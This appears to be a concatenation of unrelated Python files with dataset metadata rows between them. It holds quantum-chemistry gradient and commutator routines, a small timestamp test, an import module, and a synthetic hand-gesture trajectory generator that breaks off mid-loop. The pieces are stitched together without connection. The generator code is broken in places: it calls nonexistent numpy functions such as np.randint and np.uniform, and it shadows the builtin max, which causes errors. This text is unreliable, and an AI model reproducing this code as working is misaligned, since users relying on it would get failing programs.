rdo = of.FermionOperator(rdo) + of.hermitian_conjugated(
of.FermionOperator(rdo))
fqe_wf_rdo = fqe_wf.apply(rdo)
val1 = fqe.util.vdot(fqe_appS, fqe_wf_rdo)
val2 = fqe.util.vdot(fqe_wf_rdo, fqe_appS)
acse_ab_i = (val2 - val1) / 2j
# alpha-beta block imag
rdo = ((2 * p, 1), (2 * q + 1, 1), (2 * r + 1, 0), (2 * s, 0))
rdo = 1j * (of.FermionOperator(rdo) -
of.hermitian_conjugated(of.FermionOperator(rdo)))
fqe_wf_rdo = fqe_wf.apply(rdo)
val3 = fqe.util.vdot(fqe_appS, fqe_wf_rdo)
val4 = fqe.util.vdot(fqe_wf_rdo, fqe_appS)
acse_ab_r = (val4 - val3) / -2
# alpha-alpha block real
rdo = ((2 * p, 1), (2 * q, 1), (2 * r, 0), (2 * s, 0))
rdo = of.FermionOperator(rdo) + of.hermitian_conjugated(
of.FermionOperator(rdo))
fqe_wf_rdo = fqe_wf.apply(rdo)
val1 = fqe.util.vdot(fqe_appS, fqe_wf_rdo)
val2 = fqe.util.vdot(fqe_wf_rdo, fqe_appS)
acse_aa_i = (val2 - val1) / 2j
# alpha-alpha block imag
rdo = ((2 * p, 1), (2 * q, 1), (2 * r, 0), (2 * s, 0))
rdo = 1j * (of.FermionOperator(rdo) -
of.hermitian_conjugated(of.FermionOperator(rdo)))
fqe_wf_rdo = fqe_wf.apply(rdo)
val3 = fqe.util.vdot(fqe_appS, fqe_wf_rdo)
val4 = fqe.util.vdot(fqe_wf_rdo, fqe_appS)
acse_aa_r = (val4 - val3) / -2
# beta-beta block real
rdo = ((2 * p + 1, 1), (2 * q + 1, 1), (2 * r + 1, 0), (2 * s + 1, 0))
rdo = of.FermionOperator(rdo) + of.hermitian_conjugated(
of.FermionOperator(rdo))
fqe_wf_rdo = fqe_wf.apply(rdo)
val1 = fqe.util.vdot(fqe_appS, fqe_wf_rdo)
val2 = fqe.util.vdot(fqe_wf_rdo, fqe_appS)
acse_bb_i = (val2 - val1) / 2j
# beta-beta block imag
rdo = ((2 * p + 1, 1), (2 * q + 1, 1), (2 * r + 1, 0), (2 * s + 1, 0))
rdo = 1j * (of.FermionOperator(rdo) -
of.hermitian_conjugated(of.FermionOperator(rdo)))
fqe_wf_rdo = fqe_wf.apply(rdo)
val3 = fqe.util.vdot(fqe_appS, fqe_wf_rdo)
val4 = fqe.util.vdot(fqe_wf_rdo, fqe_appS)
acse_bb_r = (val4 - val3) / -2
return (
p,
q,
r,
s,
acse_aa_r,
acse_aa_i,
acse_bb_r,
acse_bb_i,
acse_ab_r,
acse_ab_i,
)
def get_tpdm_grad_fqe_parallel(fqe_wf, acse_res_tensor, norbs):
r"""Compute the acse gradient <psi [rdo, A] psi>
d D^{pq}_{rs} / d \lambda = <psi(lamba)|[p^ q^ s r, A]| psi(lambda)>
Args:
fqe_wf: fqe.Wavefunction object to calculate expectation value with
fqe_ham: fqe.RestrictedHamiltonian operator corresponding to a chemical
Hamiltonian
norbs: Number of orbitals. Number of spatial orbitals
Returns:
Gradient of the i^ j^ k l operator
"""
if not PARALLELIZABLE:
raise ImportError("Joblib was not imported")
four_tensor_counter = np.zeros_like(acse_res_tensor)
s_ops = []
# s_op_total = of.FermionOperator()
for p, q, r, s in product(range(2 * norbs), repeat=4):
if p * 2 * norbs + q >= s * 2 * norbs + r:
if p * 2 * norbs + q != s * 2 * norbs + r:
four_tensor_counter[p, q, r, s] += 1
four_tensor_counter[s, r, q, p] += 1
if abs(acse_res_tensor[p, q, r, s]) > 1.0e-12:
op = ((p, 1), (q, 1), (r, 0), (s, 0))
fop1 = of.FermionOperator(
op, coefficient=acse_res_tensor[p, q, r, s])
op = ((s, 1), (r, 1), (q, 0), (p, 0))
fop2 = of.FermionOperator(
op, coefficient=acse_res_tensor[s, r, q, p])
s_ops.append((fop1, fop2))
# s_op_total += fop2
# s_op_total += fop1
else:
four_tensor_counter[p, q, r, s] += 1
if abs(acse_res_tensor[p, q, r, s]) > 1.0e-12:
op = ((p, 1), (q, 1), (r, 0), (s, 0))
fop1 = of.FermionOperator(
op, coefficient=acse_res_tensor[p, q, r, s])
s_ops.append((fop1, of.FermionOperator()))
# s_op_total += fop1
assert np.allclose(four_tensor_counter, 1)
fqe_appS = copy.deepcopy(fqe_wf)
fqe_appS.set_wfn("zero")
for op1, op2 in s_ops:
fqe_appS += fqe_wf.apply(1j * (op1 + op2))
acse_aa = np.zeros((norbs, norbs, norbs, norbs), dtype=np.complex128)
acse_bb = np.zeros((norbs, norbs, norbs, norbs), dtype=np.complex128)
acse_ab = np.zeros((norbs, norbs, norbs, norbs), dtype=np.complex128)
with Parallel(n_jobs=-1) as parallel:
result = parallel(
delayed(_get_tpdm_grad_fqe_atomic)(p, q, r, s, fqe_appS, fqe_wf)
for p, q, r, s in product(range(norbs), repeat=4))
for resval in result:
p, q, r, s = resval[:4]
acse_aa[p, q, r, s] = resval[4] + resval[5]
acse_bb[p, q, r, s] = resval[6] + resval[7]
acse_ab[p, q, r, s] = resval[8] + resval[9]
# alpha-alpha block real
# unroll residual blocks into full matrix
acse_residual = np.zeros((2 * norbs, 2 * norbs, 2 * norbs, 2 * norbs),
dtype=np.complex128)
acse_residual[::2, ::2, ::2, ::2] = acse_aa
acse_residual[1::2, 1::2, 1::2, 1::2] = acse_bb
acse_residual[::2, 1::2, 1::2, ::2] = acse_ab
acse_residual[::2, 1::2, ::2, 1::2] = np.einsum("ijkl->ijlk", -acse_ab)
acse_residual[1::2, ::2, ::2, 1::2] = np.einsum("ijkl->jilk", acse_ab)
acse_residual[1::2, ::2, 1::2, ::2] = np.einsum(
"ijkl->ijlk", -acse_residual[1::2, ::2, ::2, 1::2])
return acse_residual
def two_rdo_commutator(two_body_tensor: np.ndarray, tpdm: np.ndarray,
d3: np.ndarray) -> np.ndarray:
r"""
Calculate <psi | [p^ q^ r s, A] | psi> where A two-body operator
A = \sum_{ijkl}A^{ij}_{lk}i^ j^ k l
where A^{ij}_{lk} is a 4-index tensor. There is no restriction on the
structure of A.
Args:
two_body_tensor: 4-tensor for the coefficients of A
tpdm: spin-orbital two-RDM p^ q^ r s corresponding to (1'2'2 1)
d3: spin-orbital three-RDM p^ q^ r^ s t u corresponding to (1'2'3'32 1)
"""
dim = tpdm.shape[0]
tensor_of_expectation = np.zeros(tuple([dim] * 4), dtype=tpdm.dtype)
for p, q, r, s in product(range(dim), repeat=4):
commutator_expectation = 0.
# ( -1.00000) kdelta(i,r) kdelta(j,s) cre(p) cre(q) des(k) des(l)
commutator_expectation += -1.0 * np.einsum('kl,kl',
two_body_tensor[r, s, :, :],
tpdm[p, q, :, :],
optimize=True)
# ( 1.00000) kdelta(i,s) kdelta(j,r) cre(p) cre(q) des(k) des(l)
commutator_expectation += 1.0 * np.einsum('kl,kl',
two_body_tensor[s, r, :, :],
tpdm[p, q, :, :],
optimize=True)
# ( 1.00000) kdelta(k,p) kdelta(l,q) cre(i) cre(j) des(r) des(s)
commutator_expectation += 1.0 * np.einsum('ij,ij',
two_body_tensor[:, :, p, q],
tpdm[:, :, r, s],
optimize=True)
# ( -1.00000) kdelta(k,q) kdelta(l,p) cre(i) cre(j) des(r) des(s)
commutator_expectation += -1.0 * np.einsum('ij,ij',
two_body_tensor[:, :, q, p],
tpdm[:, :, r, s],
optimize=True)
# ( 1.00000) kdelta(i,r) cre(j) cre(p) cre(q) des(k) des(l) des(s)
commutator_expectation += 1.0 * np.einsum('jkl,jkl',
two_body_tensor[r, :, :, :],
d3[:, p, q, :, :, s],
optimize=True)
# ( -1.00000) kdelta(i,s) cre(j) cre(p) cre(q) des(k) des(l) des(r)
commutator_expectation += -1.0 * np.einsum('jkl,jkl',
two_body_tensor[s, :, :, :],
d3[:, p, q, :, :, r],
optimize=True)
# ( -1.00000) kdelta(j,r) cre(i) cre(p) cre(q) des(k) des(l) des(s)
commutator_expectation += -1.0 * np.einsum('ikl,ikl',
two_body_tensor[:, r, :, :],
d3[:, p, q, :, :, s],
optimize=True)
# ( 1.00000) kdelta(j,s) cre(i) cre(p) cre(q) des(k) des(l) des(r)
commutator_expectation += 1.0 * np.einsum('ikl,ikl',
two_body_tensor[:, s, :, :],
d3[:, p, q, :, :, r],
optimize=True)
# ( -1.00000) kdelta(k,p) cre(i) cre(j) cre(q) des(l) des(r) des(s)
commutator_expectation += -1.0 * np.einsum('ijl,ijl',
two_body_tensor[:, :, p, :],
d3[:, :, q, :, r, s],
optimize=True)
# ( 1.00000) kdelta(k,q) cre(i) cre(j) cre(p) des(l) des(r) des(s)
commutator_expectation += 1.0 * np.einsum('ijl,ijl',
two_body_tensor[:, :, q, :],
d3[:, :, p, :, r, s],
optimize=True)
# ( 1.00000) kdelta(l,p) cre(i) cre(j) cre(q) des(k) des(r) des(s)
commutator_expectation += 1.0 * np.einsum('ijk,ijk',
two_body_tensor[:, :, :, p],
d3[:, :, q, :, r, s],
optimize=True)
# ( -1.00000) kdelta(l,q) cre(i) cre(j) cre(p) des(k) des(r) des(s)
commutator_expectation += -1.0 * np.einsum('ijk,ijk',
two_body_tensor[:, :, :, q],
d3[:, :, p, :, r, s],
optimize=True)
tensor_of_expectation[p, q, r, s] = commutator_expectation
return tensor_of_expectation
def two_rdo_commutator_symm(two_body_tensor: np.ndarray, tpdm: np.ndarray,
d3: np.ndarray) -> np.ndarray:
r"""
Calculate <psi | [p^ q^ r s, A] | psi> where A two-body operator
A = \sum_{ijkl}A^{ij}_{lk}i^ j^ k l
where A^{ij}_{lk} is antisymmetric and hermitian
Args:
two_body_tensor: 4-tensor for the coefficients of A
tpdm: spin-orbital two-RDM p^ q^ r s corresponding to (1'2'2 1)
d3: spin-orbital three-RDM p^ q^ r^ s t u corresponding to (1'2'3'32 1)
"""
dim = tpdm.shape[0]
tensor_of_expectation = np.zeros(tuple([dim] * 4), dtype=tpdm.dtype)
k2 = two_body_tensor.transpose(0, 1, 3, 2)
for p, q, r, s in product(range(dim), repeat=4):
commutator_expectation = 0.
# ( -2.00000) k2(p,q,a,b) cre(a) cre(b) des(r) des(s)
commutator_expectation += -2. * np.einsum('ab,ab', k2[p, q, :, :],
tpdm[:, :, r, s])
# ( 2.00000) k2(r,s,a,b) cre(p) cre(q) des(a) des(b)
commutator_expectation += 2. * np.einsum('ab,ab', k2[r, s, :, :],
tpdm[p, q, :, :])
# ( 2.00000) k2(p,a,b,c) cre(q) cre(b) cre(c) des(r) des(s) des(a)
commutator_expectation += 2. * np.einsum('abc,bca', k2[p, :, :, :],
d3[q, :, :, r, s, :])
# ( -2.00000) k2(q,a,b,c) cre(p) cre(b) cre(c) des(r) des(s) des(a)
commutator_expectation += -2. * np.einsum('abc,bca', k2[q, :, :, :],
d3[p, :, :, r, s, :])
# ( -2.00000) k2(r,a,b,c) cre(p) cre(q) cre(a) des(s) des(b) des(c)
commutator_expectation += -2. * np.einsum('abc,abc', k2[r, :, :, :],
d3[p, q, :, s, :, :])
# ( 2.00000) k2(s,a,b,c) cre(p) cre(q) cre(a) des(r) des(b) des(c)
commutator_expectation += 2. * np.einsum('abc,abc', k2[s, :, :, :],
d3[p, q, :, r, :, :])
tensor_of_expectation[p, q, r, s] = commutator_expectation
return tensor_of_expectation
def two_rdo_commutator_antisymm(two_body_tensor: np.ndarray, tpdm: np.ndarray,
d3: np.ndarray) -> np.ndarray:
r"""
Calculate <psi | [p^ q^ r s, A] | psi> where A two-body operator
A = \sum_{ijkl}A^{ij}_{lk}i^ j^ k l
where A^{ij}_{lk} is antisymmetric and antihermitian
Args:
two_body_tensor: 4-tensor for the coefficients of A
tpdm: spin-orbital two-RDM p^ q^ r s corresponding to (1'2'2 1)
d3: spin-orbital three-RDM p^ q^ r^ s t u corresponding to (1'2'3'32 1)
"""
dim = tpdm.shape[0]
tensor_of_expectation = np.zeros(tuple([dim] * 4), dtype=tpdm.dtype)
k2 = two_body_tensor.transpose(0, 1, 3, 2)
for p, q, r, s in product(range(dim), repeat=4):
commutator_expectation = 0.
# ( 2.00000) k2(p,q,a,b) cre(a) cre(b) des(r) des(s)
commutator_expectation += 2. * np.einsum('ab,ab', k2[p, q, :, :],
tpdm[:, :, r, s])
# ( 2.00000) k2(r,s,a,b) cre(p) cre(q) des(a) des(b)
commutator_expectation += 2. * np.einsum('ab,ab', k2[r, s, :, :],
tpdm[p, q, :, :])
# ( -2.00000) k2(p,a,b,c) cre(q) cre(b) cre(c) des(r) des(s) des(a)
commutator_expectation += -2. * np.einsum('abc,bca', k2[p, :, :, :],
d3[q, :, :, r, s, :])
# ( 2.00000) k2(q,a,b,c) cre(p) cre(b) cre(c) des(r) des(s) des(a)
commutator_expectation += 2. * np.einsum('abc,bca', k2[q, :, :, :],
d3[p, :, :, r, s, :])
# ( -2.00000) k2(r,a,b,c) cre(p) cre(q) cre(a) des(s) des(b) des(c)
commutator_expectation += -2. * np.einsum('abc,abc', k2[r, :, :, :],
d3[p, q, :, s, :, :])
# ( 2.00000) k2(s,a,b,c) cre(p) cre(q) cre(a) des(r) des(b) des(c)
commutator_expectation += 2. * np.einsum('abc,abc', k2[s, :, :, :],
d3[p, q, :, r, :, :])
tensor_of_expectation[p, q, r, s] = commutator_expectation
return tensor_of_expectation
def one_rdo_commutator_symm(two_body_tensor: np.ndarray,
tpdm: np.ndarray) -> np.ndarray:
r"""
Calculate <psi | [p^ q, A] | psi> where A is a two-body operator
A = \sum_{ijkl}A^{ij}_{lk}i^ j^ k l
where A^{ij}_{lk} is antisymmetric and hermitian
Args:
two_body_tensor: 4-tensor for the coefficients of A
tpdm: spin-orbital two-RDM p^ q^ r s corresponding to (1'2'2 1)
"""
dim = tpdm.shape[0]
tensor_of_expectation = np.zeros(tuple([dim] * 2), dtype=tpdm.dtype)
k2 = two_body_tensor.transpose(0, 1, 3, 2)
for p, q in product(range(dim), repeat=2):
commutator_expectation = 0.
# ( 2.00000) k2(p,a,b,c) cre(b) cre(c) des(q) des(a)
commutator_expectation += 2.0 * np.einsum('abc,bca', k2[p, :, :, :],
tpdm[:, :, q, :])
# ( -2.00000) k2(q,a,b,c) cre(p) cre(a) des(b) des(c)
commutator_expectation += -2.0 * np.einsum('abc,abc', k2[q, :, :, :],
tpdm[p, :, :, :])
tensor_of_expectation[p, q] = commutator_expectation
return tensor_of_expectation
| 42.540436 | 87 | 0.512297 | 4,790 | 33,139 | 3.418163 | 0.062213 | 0.013559 | 0.012093 | 0.015147 | 0.901179 | 0.878397 | 0.870091 | 0.862151 | 0.848714 | 0.844805 | 0 | 0.048356 | 0.336643 | 33,139 | 778 | 88 | 42.595116 | 0.696447 | 0.217267 | 0 | 0.778234 | 0 | 0 | 0.016974 | 0.001022 | 0 | 0 | 0 | 0 | 0.004107 | 1 | 0.022587 | false | 0 | 0.022587 | 0 | 0.069815 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3aa25b6ab9be152ab82eacd2419e7b82bfb67dc8 | 207 | py | Python | tests/test_tools.py | sneakers-the-rat/nwb-conversion-tools | 46a242f01ba80e489a1d4e89c8612036c7f04f56 | [
"BSD-3-Clause"
] | null | null | null | tests/test_tools.py | sneakers-the-rat/nwb-conversion-tools | 46a242f01ba80e489a1d4e89c8612036c7f04f56 | [
"BSD-3-Clause"
] | null | null | null | tests/test_tools.py | sneakers-the-rat/nwb-conversion-tools | 46a242f01ba80e489a1d4e89c8612036c7f04f56 | [
"BSD-3-Clause"
] | 1 | 2021-06-28T20:38:31.000Z | 2021-06-28T20:38:31.000Z | from nwb_conversion_tools.conversion_tools import check_regular_timestamps
def test_check_regular_timestamps():
assert check_regular_timestamps([1,2,3])
assert not check_regular_timestamps([1,2,4]) | 34.5 | 74 | 0.826087 | 30 | 207 | 5.3 | 0.533333 | 0.301887 | 0.553459 | 0.289308 | 0.301887 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032086 | 0.096618 | 207 | 6 | 75 | 34.5 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.25 | true | 0 | 0.25 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3aef7545354f7a3462b89a8d351049887dbd0b3d | 130 | py | Python | net_models/models/services/__init__.py | mihudec/netcm | 380786793e35206cae923e613458be9eb9f0a02e | [
"MIT"
] | null | null | null | net_models/models/services/__init__.py | mihudec/netcm | 380786793e35206cae923e613458be9eb9f0a02e | [
"MIT"
] | null | null | null | net_models/models/services/__init__.py | mihudec/netcm | 380786793e35206cae923e613458be9eb9f0a02e | [
"MIT"
] | 1 | 2021-08-09T06:33:28.000Z | 2021-08-09T06:33:28.000Z | from .ServerModels import *
from .cisco_ios.AaaMethods import *
from .cisco_ios.IosLineModels import *
from .NetworkClock import * | 32.5 | 38 | 0.807692 | 16 | 130 | 6.4375 | 0.5 | 0.291262 | 0.291262 | 0.349515 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.115385 | 130 | 4 | 39 | 32.5 | 0.895652 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
c9147e1520c8ffec3dead9254adb6d6bcc9b4ec6 | 31,344 | py | Python | HandWashNet1/dbGenerate.py | ucrscholar/HandWashNet | 2a01099b9d054956fd335ec4de6aff2064d5ef4e | [
"MIT"
] | 1 | 2020-06-17T12:49:34.000Z | 2020-06-17T12:49:34.000Z | HandWashNet1/dbGenerate.py | ucrscholar/HandWashNet | 2a01099b9d054956fd335ec4de6aff2064d5ef4e | [
"MIT"
] | null | null | null | HandWashNet1/dbGenerate.py | ucrscholar/HandWashNet | 2a01099b9d054956fd335ec4de6aff2064d5ef4e | [
"MIT"
] | null | null | null | import math
from math import pi
import numpy as np
from matplotlib import pyplot
from sklearn.preprocessing import LabelEncoder
#from tensorflow_core.python.keras.utils import to_categorical
import random
from tensorflow_core.python.keras.utils.np_utils import to_categorical
def generate_DampedSin(period, i, decay, amplify=1):
return [i / period, 0.5 + 0.5 * amplify * np.sin(2 * pi * i / period) * np.exp(-decay * i)]
def generate_DampedSinDuration(period, i, decay, amplify=1):
if i > period * 2:
return [-1, -1]
return [i / period, 0.5 + 0.5 * amplify * np.sin(2 * pi * i / period) * np.exp(-decay * i)]
def generate_sin(period, i, decay=0, amplify=1):
return [i / period, 0.5 + 0.5 * amplify * np.sin(2 * pi * i / period)]
def generate_sinDuration(period, i, decay=0, amplify=1):
if i > period:
return [-1, -1]
return [i / period, 0.5 + 0.5 * amplify * np.sin(2 * pi * i / period)]
def generate_circle(period, i, decay=0, radius=1, x0=0, y0=0):
R = radius
x_0 = x0
y_0 = y0
d = np.uniform(0.01, 0.1)
# for t in range(0, 2 * pi, 0.01):
dd = list()
zz = list()
for t in range(1000):
t = t / 1000.0
x = (R * np.cos(2 * pi * t / period) + R) / 2 * R + x_0
y = (R * np.sin(2 * pi * t / period) + R) / 2 * R + y_0
dd.append(y)
zz.append(x)
x = (R * np.cos(2 * pi * i / period) + R) / 2 * R + x_0
y = (R * np.sin(2 * pi * i / period) + R) / 2 * R + y_0
return [x, y]
def generate_circleDuration(period, i, decay=0, radius=1, x0=0, y0=0):
R = radius
x_0 = x0
y_0 = y0
d = np.uniform(0.01, 0.1)
# for t in range(0, 2 * pi, 0.01):
dd = list()
zz = list()
for t in range(1000):
t = t / 1000.0
x = (R * np.cos(2 * pi * t / period) + R) / 2 * R + x_0
y = (R * np.sin(2 * pi * t / period) + R) / 2 * R + y_0
dd.append(y)
zz.append(x)
miy = min(dd)
mix = min(zz)
may = max(dd)
max = max(zz)
if i > period:
return [-1, -1]
x = (R * np.cos(2 * pi * i / period) + R) / 2 * R + x_0
y = (R * np.sin(2 * pi * i / period) + R) / 2 * R + y_0
return [x, y]
def generate_Heart(period, i, decay):
x_0 = np.randint(0, 1)
y_0 = np.randint(0, 1)
d = np.uniform(0.01, 0.1)
t = i
dd = list()
zz = list()
for t in range(1000):
t = t / 1000.0
t = 2 * pi * t / period
x = 16 * pow(np.sin(t), 3)
y = 13 * np.cos(t) - 5 * np.cos(2 * t) - 2 * np.cos(3 * t) - np.cos(4 * t)
dd.append(y)
zz.append(x)
miy = min(dd)
mix = min(zz)
may = max(dd)
maxx = max(zz)
i = 2 * pi * i / period
x = 16 * pow(np.sin(i), 3)
y = 13 * np.cos(i) - 5 * np.cos(2 * i) - 2 * np.cos(3 * i) - np.cos(4 * i)
x = (x - mix) / (maxx - mix)
y = (y - miy) / (may - miy)
return [x, y]
def generate_HeartDuration(period, i, decay):
x_0 = np.randint(0, 1)
y_0 = np.randint(0, 1)
d = np.uniform(0.01, 0.1)
t = i
dd = list()
zz = list()
for t in range(1000):
t = t / 1000.0
t = 2 * pi * t / period
x = 16 * pow(np.sin(t), 3)
y = 13 * np.cos(t) - 5 * np.cos(2 * t) - 2 * np.cos(3 * t) - np.cos(4 * t)
dd.append(y)
zz.append(x)
miy = min(dd)
mix = min(zz)
may = max(dd)
max = max(zz)
if i > period:
return [-1, -1]
i = 2 * pi * i / period
x = 16 * pow(np.sin(i), 3)
y = 13 * np.cos(i) - 5 * np.cos(2 * i) - 2 * np.cos(3 * i) - np.cos(4 * i)
x = (x - mix) / (max - mix)
y = (y - miy) / (may - miy)
return [x, y]
# generate input and output pairs of damped sine waves
def generate_examplesX(length, n_patterns, output):
X, y = list(), list()
for _ in range(n_patterns):
p = np.randint(10, 20)
d = np.uniform(0.01, 0.1)
sequence = [0, 1] # generate_sequenceDampedSin(length + output, p, d)
X.append(sequence[:-output])
y.append(sequence[-output:])
X = np.array(X).reshape(n_patterns, length, 1)
y = np.array(y).reshape(n_patterns, output)
return X, y
# test problem generation
# X, y = generate_examples(20, 5, 5)
# for i in range(len(X)):
# pyplot.plot([x for x in X[i, :, 0]] + [x for x in y[i]],'-o')
# pyplot.show()
###########################################################################################
# generate the next frame in the sequence
def next_frame(last_step, last_frame, column):
# define the scope of the next step
lower = max(0, last_step - 1)
upper = min(last_frame.shape[0] - 1, last_step + 1)
# choose the row index for the next step
step = np.randint(lower, upper)
# copy the prior frame
frame = last_frame.copy()
# add the new step
frame[step, column] = 1
return frame, step
def generateFrame(row, column, last_frame):
# define the scope of the next step
lower = max(0, row - 1)
upper = min(last_frame.shape[0] - 1, row + 1)
if row > last_frame.shape[0] - 1:
row = last_frame.shape[0] - 1
if column > last_frame.shape[1] - 1:
column = last_frame.shape[1] - 1
# choose the row index for the next step
step = 0 # np.randint(lower, upper)
# copy the prior frame
frame = last_frame.copy()
# add the new step
if row >= 0 or column >= 0:
frame[row, column] = 1
return frame, step
def next_frameSin(row, last_frame, column):
# define the scope of the next step
lower = max(0, row - 1)
upper = min(last_frame.shape[0] - 1, row + 1)
if row > last_frame.shape[0] - 1:
row = last_frame.shape[0] - 1
if column > last_frame.shape[1] - 1:
column = last_frame.shape[1] - 1
# choose the row index for the next step
step = 0 # np.randint(lower, upper)
# copy the prior frame
frame = last_frame.copy()
# add the new step
if row >= 0 or column >= 0:
frame[row, column] = 1
return frame, step
def next_frameDampedSin(row, last_frame, column):
# define the scope of the next step
lower = max(0, row - 1)
upper = min(last_frame.shape[0] - 1, row + 1)
if row > last_frame.shape[0] - 1:
row = last_frame.shape[0] - 1
if column > last_frame.shape[1] - 1:
column = last_frame.shape[1] - 1
# choose the row index for the next step
step = 0
# copy the prior frame
frame = last_frame.copy()
# add the new step
if row >= 0 or column >= 0:
frame[row, column] = 1
return frame, step
def next_frameDampedCircle(row, last_frame, column):
# define the scope of the next step
lower = max(0, row - 1)
upper = min(last_frame.shape[0] - 1, row + 1)
if row > last_frame.shape[0] - 1:
row = last_frame.shape[0] - 1
if column > last_frame.shape[1] - 1:
column = last_frame.shape[1] - 1
# choose the row index for the next step
step = 0 # np.randint(lower, upper)
# copy the prior frame
frame = last_frame.copy()
# add the new step
if row >= 0 or column >= 0:
frame[row, column] = 1
return frame, step
def next_frameDampedHeart(row, last_frame, column):
# define the scope of the next step
lower = max(0, row - 1)
upper = min(last_frame.shape[0] - 1, row + 1)
if row > last_frame.shape[0] - 1:
row = last_frame.shape[0] - 1
if column > last_frame.shape[1] - 1:
column = last_frame.shape[1] - 1
# choose the row index for the next step
step = 0 # np.randint(lower, upper)
# copy the prior frame
frame = last_frame.copy()
# add the new step
if row >= 0 or column >= 0:
frame[row, column] = 1
return frame, step
# generate a sequence of frames of a dot moving across an image
def build_frames(size, timeStep=0):
frames = list()
labelA = list()
labelB = list()
labelC = list()
# create the first frame
frame = np.zeros((size, size))
step = np.randint(0, size - 1)
# decide if we are heading left or right
right = 1 if np.random() < 0.5 else 0
col = 0 if right else size - 1
frame[step, col] = 0
frames.append(frame)
# create all remaining frames
'''for i in range(1, size):
col = i if right else size - 1 - i
frame, step = next_frame(step, frame, col)
frames.append(frame)'''
amplify = np.randint(5, 10) / 10.0
xratio = np.randint(1, 4)
yratio = np.randint(1, 4)
labelA.append('NailWashLeft')
for i in range(1, size):
i = i / float(size)
column, row = generate_sin(1, i, amplify=amplify)
# frame = np.zeros((size, size))
frame, step = next_frameSin(int(row * size / xratio), frame, int(column * size / yratio))
frames.append(frame)
# labelA.append('NailWashLeft')
frame = np.zeros((size, size))
frames.append(frame)
amplify = np.randint(5, 20) / 10.0
xratio = np.randint(1, 4)
yratio = np.randint(1, 4)
labelA.append('NailWashRight')
for i in range(1, size):
i = i / float(size)
column, row = generate_DampedSin(0.5, i, 3, amplify=amplify)
# frame = np.zeros((size, size))
frame, step = next_frameDampedSin(int(row * size / xratio), frame, int(column * size / yratio))
frames.append(frame)
# labelA.append('NailWashRight')
frame = np.zeros((size, size))
frames.append(frame)
radius = np.randint(5, 7) / 10
xratio = np.randint(1, 3)
yratio = np.randint(1, 3)
x0 = np.randint(2, 3) / 10
y0 = np.randint(2, 3) / 10
labelA.append('ThumbFingureWash')
for i in range(1, size):
i = float(i) / float(size)
column, row = generate_circle(1, i, 0.5, radius=radius, x0=x0, y0=y0)
# frame = np.zeros((size, size))
frame, step = next_frameDampedCircle(int(row * size / xratio), frame, int(column * size / yratio))
frames.append(frame)
# labelA.append('ThumbFingureWash')
frame = np.zeros((size, size))
frames.append(frame)
radius = np.randint(5, 7) / 10
xratio = np.randint(1, 3)
yratio = np.randint(1, 3)
labelA.append('ForeFingureWash')
for i in range(1, size):
i = float(i) / float(size)
column, row = generate_Heart(1, i, 0.5)
# frame = np.zeros((size, size))
frame, step = next_frameDampedHeart(int(row * size / xratio), frame, int(column * size / yratio))
frames.append(frame)
# labelA.append('ForeFingureWash')
return frames, labelA
def GestureA(size, period=100, type=0):
frames = list()
labelA = list()
amplify = np.random.randint(5, 10) / 10.0
xratio = 2 # rang(1,5)
yratio = 1 # rang(0.1,1,0.1)
zratio = size - yratio * size # rang(0,size - yratio* size)
if type == 1 or type == 2:
xratio = np.random.randint(3, 5) # rang(1,5)
yratio = np.random.randint(1, 10) / 10.0 # rang(0.1,1,0.1)
zratio = np.random.randint(0, size - yratio * size) # rang(0,size - yratio* size)
labelA.append('GestureA')
x = list()
y = list()
for i in range(0, period):
x1, y1 = [i, 50 + 50 * np.sin(2 * pi * i / period)]
x.append(x1)
y.append(y1)
x2 = list()
y2 = list()
for i in range(0, period, xratio):
# print(x[i], y[i])
xx = x[i] / 100 * (size - 1)
yy = y[i] / 100 * (size - 1) * yratio + zratio
x2.append(xx)
y2.append(yy)
# frame = np.zeros((size, size), dtype=int)
for i, (xx, yy) in enumerate(zip(x2, y2)):
# frame = frame.copy()
if i < len(x2) - 1:
frame = np.zeros((size, size), dtype=int)
frame[math.floor(yy), math.floor(xx)] = 1
frames.append(frame)
'''f = pyplot.figure(figsize=(5, 5))
# create a grayscale subplot for each frame
ax = f.add_subplot(1, 1, 1)
ax.imshow(frame, cmap='Greys')
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
pyplot.show()'''
'''if type == 1:
for i in range(0, size - len(x2)):
frame = np.zeros((size, size), dtype=int)
frames.append(frame)'''
return frames, labelA
def GestureB(size, period=100, type=0):
frames = list()
labelA = list()
amplify = np.random.randint(5, 10) / 10.0
xratio = 2 # range(2,5)
yratio = 0.5 # range(0.1,1,0.1)
zratio = size - yratio * size # rang(0,size - yratio* size)
if type == 1 or type == 2:
xratio = np.random.randint(3, 5) # rang(1,5)
yratio = np.random.randint(1, 10) / 10.0 # rang(0.1,1,0.1)
zratio = np.random.randint(0, size - yratio * size) # rang(0,size - yratio* size)
decay = 0.03
labelA.append('GestureB')
x = list()
y = list()
for i in range(0, period):
x1, y1 = [i, 50 + 50 * np.sin(2 * pi * i / (period / 2)) * np.exp(-decay * i)]
x.append(x1)
y.append(y1)
x2 = list()
y2 = list()
for i in range(0, period, xratio):
# print(x[i], y[i])
xx = x[i] / 100 * (size - 1)
